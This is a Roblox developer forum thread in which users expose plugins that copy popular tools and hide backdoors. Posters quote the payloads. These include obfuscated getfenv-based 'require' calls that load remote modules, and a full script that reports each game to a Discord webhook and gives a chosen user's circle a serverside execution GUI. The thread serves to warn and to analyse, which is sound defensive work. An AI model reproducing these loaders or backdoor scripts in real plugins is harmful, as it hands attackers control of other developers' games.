yusatial
(yusa)
May 30, 2020, 3:33pm
#44
Original: ?
Malicious plugin: https://www.roblox.com/library/5109887609/Todds-Anti-Backdoor
Malicious action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Original: https://www.roblox.com/library/1256428022/Tree-Generator (belongs to Crazyman32)
Malicious plugin: https://www.roblox.com/library/5108497694/Tree-Generator
Malicios action:
pcall(function(ff)getfenv()['\114\101\113\117\105\114\101'](5090011414).beef()end)
Both of the malicious action leads to this plugin - https://www.roblox.com/library/5090011414/beefintestines - it’s an obfuscated script, however by constant dumping and inspecting its constants, it’s clear that it’s a backdoor, it’s constant dump can be found here - https://pastebin.com/raw/FhZyxTty .
1 Like
F3X Plugin
Malicious:
Original:
Fake Anti-Virus/Backdoor Scanner
Malicious:
1 Like
yusatial
(yusa)
May 30, 2020, 7:01pm
#47
1 Like
NickoSCP
(NickoSCP)
June 7, 2020, 6:38pm
#48
Malicious Script, plugin unknown
require(4751241292)()
Malicious Action
local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
if f == true then
return true
else
return false
end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
local A = CheckHttp()
if A == true then
local Data = {
content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
GUI:Clone().Parent = plr.PlayerGui
end
end
local A = CheckHttp()
if A == true then
local Data = {
content = "omg a game! https://www.roblox.com/games/"..game.PlaceId;
username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end
Essentially gives a serverside loadstring gui if a player is or is friends with…
https://www.roblox.com/users/1460281907/profile
Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.
2 Likes
NickoSCP
(NickoSCP)
July 6, 2020, 10:57pm
#49
Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.
after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.
I’m not bothering to go in full detail on why I believe this is malicious due to having an alternative issue that I consider to be ‘robloxsev ere’
This plugin is possibly malicious:
I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.
1 Like
Webm07
(Webm07)
July 24, 2020, 11:29am
#51
Malicious
.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)
Malicious
RStudioUpdate & Script contain obfuscated code
Real Roundify
Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory
** Tag Editor**
Original: 948084095
Malicious: 4972325708
Creates an Antilag script in ServerScriptService upon installation.
1 Like
F3X Building Tools & LoadCharacter.
If someone can check these plugins, these were all botted to the front page and probably insert serversides. (if I’m correct)
Malicious plugin(s): 5754612786 , 5864780072
Original plugin: 752585459
Malicous: 5747884333 , 5747884333 , 5727376746 , and much more.
Original: 144950355
Also, It isn’t even possible to find a original plugin anymore 60% of the time.
Should add an email requirement for uploading plugins, even in bestselling when searching.
.
5 Likes
Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.
ghidras
(popbob)
November 2, 2020, 9:11pm
#55
Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.
Roblox Studio+ (Updated
Backdoored: 5770454604
There isn’t a Roblox Studio+ original model, and the model leads to:
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)
Which in return leads to a model called Linker which links to an asset named Poseidon SS. Another serverside which looks heavily skidded.
1 Like
Praeterian
(Praeterian)
November 25, 2020, 11:48pm
#56
Why does this point to a “dummy.com ” URL ? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.
The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about
2 Likes
ghidras
(popbob)
November 26, 2020, 8:03am
#57
dummy.com or google.com are usually domains that serversides use for non http game logging.
3 Likes
deluc_t
(Deluct)
December 26, 2020, 4:28pm
#59
How can you log games with google.com or dummy.com ? They use discord.
They check if https service is enabled by sending a GET request to those urls, if it fails, it’s disabled, if it succeeds, then it’s enabled
1 Like
deluc_t
(Deluct)
December 26, 2020, 8:46pm
#61
1 Like
No duh, of course they do that to send the game to the logs
deluc_t
(Deluct)
December 26, 2020, 8:49pm
#63
They do that to send to logs and they usually use it for checking if HTTP is enabled.
(desterify said that they log games with google.com , which they dont)